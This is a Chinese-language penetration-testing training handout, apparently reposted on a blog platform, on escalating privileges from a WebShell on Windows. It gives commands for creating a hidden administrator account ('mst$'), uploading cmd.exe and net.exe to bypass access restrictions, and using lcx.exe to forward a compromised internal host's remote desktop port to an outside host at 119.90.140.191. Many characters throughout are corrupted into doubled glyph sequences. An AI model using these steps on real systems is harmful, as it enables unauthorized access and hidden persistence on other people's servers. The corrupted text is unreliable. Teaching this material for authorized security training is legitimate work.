米斯特白帽培訓(xùn)講義 漏洞篇 提權(quán)

米斯特白帽培訓(xùn)講義 漏洞篇 提權(quán)

講師:gh0stkey

整理:飛龍

協(xié)議:CC BY-NC-SA 4.0

提權(quán),顧名思義就是提高自己在服務(wù)器中的權(quán)限,就比如在 Windows 中你本身登錄的用戶是 guest,通過提權(quán)后就變成超級(jí)管理員,擁有了管理 Windows 的所有權(quán)限。提權(quán)是黑客的專業(yè)名詞,一般用于網(wǎng)站入侵和系統(tǒng)入侵。本講義所講的是基于 WebShell 的菜刀管理下提權(quán)。

基本 Dos 命令、常識(shí)

  • whoami:查看當(dāng)前用戶名,用于查看權(quán)限大小。
  • ipconfig:顯示當(dāng)前 TCP/IP 配置,用于查看 IP。
  • net user:查看當(dāng)前系統(tǒng)的所有用戶。
  • net user <用戶名> <用戶密碼> /add:創(chuàng)建用戶。
  • net localgroup administrators <用戶名> /add:將用戶加入administrators用戶組。
  • 遠(yuǎn)程連接默認(rèn)端口:3389。

下面拿菜刀中的 Shell 演示一遍這幾個(gè)命令。

首先是whoami,可以看到administrator,應(yīng)該是管理員。

然后是ipconfig,我們可以看到192.168.175.129,這是內(nèi)網(wǎng)的 IP。

然后是net user

知道這些用戶之后,我們需要?jiǎng)?chuàng)建自己的用戶mst。創(chuàng)建后再執(zhí)行net user,可以看到創(chuàng)建成功:

接下來我們創(chuàng)建一個(gè)名為mst$的用戶:

可以看到它并沒有顯示在用戶列表中,之后我們再執(zhí)行net user mst$

它又是確實(shí)存在的,這就是隱藏用戶的一個(gè)小技巧。

之后我們把mst$添加到管理員組中,并且查看它的信息,我們發(fā)現(xiàn)它成功剛添加到了管理員組中。

需要遠(yuǎn)程連接的時(shí)候,輸入剛剛創(chuàng)建的用戶名和密碼就可以了。

突破限制

假如說我們在實(shí)際情況中看到了[Err]拒絕訪問

那我們可以找到自己電腦上的cmd.exe,然后上傳上去。比如上傳路徑如下:

我們就可以執(zhí)行setp <路徑>\cmd.exe

我們再來看各種命令:

net user還是拒絕訪問的,我們用老方法,找到自己電腦中的net.exe,然后傳上去。之后執(zhí)行<路徑>\net.exe user

可以看到突破了限制。

端口轉(zhuǎn)發(fā)

在提權(quán)過程中,我們經(jīng)常碰到這樣的情況:

我們可以看到 WebShell 的主機(jī)處于內(nèi)網(wǎng)下,內(nèi)網(wǎng)的意思就是說,它能連接別人,但別人不能連接它,就跟連接路由器的個(gè)人電腦差不多。

那么這種情況下,我們就需要用到端口轉(zhuǎn)發(fā)工具lcx.exe,除此之外,還需要一臺(tái)擁有外網(wǎng) IP 的主機(jī)。這里我們把內(nèi)網(wǎng)的主機(jī)叫做肉雞,獨(dú)立 IP 主機(jī)叫做本機(jī)。

lcx.exe上傳至本機(jī)和肉雞之后,首先確定本機(jī)的 IP 為119.90.140.191

然后我們在本機(jī)執(zhí)行:

lcx.exe -listen 51 3388

這條命令的意思就是說,監(jiān)聽本機(jī)的 51 和 3388 端口,并將兩個(gè)端口互相轉(zhuǎn)發(fā),端口 51 的入境流量發(fā)給端口 3388,反之亦然。其中 51 是用于肉雞連接的端口。3388 是用于我們的遠(yuǎn)程連接客戶端連接的端口,為了避免與本機(jī)的遠(yuǎn)程連接服務(wù)沖突,選擇了 3388。大家可以自行選擇其他未占用端口。

然后我們在肉雞上執(zhí)行:

lcx.exe -slave 119.90.140.191 51 127.0.0.1 3389

這條命令連接肉雞的 3389 端口,和本機(jī)的 51 端口,并互相轉(zhuǎn)發(fā)。

之后,我們在本機(jī)或其他主機(jī)上使用遠(yuǎn)程連接客戶端,連接119.90.140.191:3388,可以看到lcx中顯示了轉(zhuǎn)發(fā)的信息。

遠(yuǎn)程連接客戶端的封包會(huì)發(fā)給主機(jī)的lcx,之后會(huì)發(fā)給肉雞的lcx,之后會(huì)發(fā)給肉雞的遠(yuǎn)程連接服務(wù)。響應(yīng)封包會(huì)按原路返回。

等待一會(huì)兒之后,我們成功連接了肉雞的遠(yuǎn)程桌面:

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡書系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

  • 米斯特白帽培訓(xùn)講義 漏洞篇 提權(quán) 講師:gh0stkey 整理:飛龍 協(xié)議:CC BY-NC-SA 4.0 提權(quán),...
    布客飛龍閱讀 611評論 1 4
  • 部分內(nèi)容轉(zhuǎn)載自搜狗百科 cmd是command的縮寫.即命令提示符(CMD),是在OS / 2 , Windows...
    青冥之上閱讀 2,489評論 0 24
  • Spring Cloud為開發(fā)人員提供了快速構(gòu)建分布式系統(tǒng)中一些常見模式的工具(例如配置管理,服務(wù)發(fā)現(xiàn),斷路器,智...
    卡卡羅2017閱讀 136,545評論 19 139
  • win7 cmd管理員權(quán)限設(shè)置 net localgroup administrators 用戶名 /add 把“...
    f675b1a02698閱讀 5,510評論 0 11
  • nmap使用指南(終極版) 原創(chuàng)2017-09-09hl0rey信安之路 一、目標(biāo)指定 1.CIDR標(biāo)志位 192...
    用電熱毯烤豬閱讀 12,150評論 1 49

友情鏈接更多精彩內(nèi)容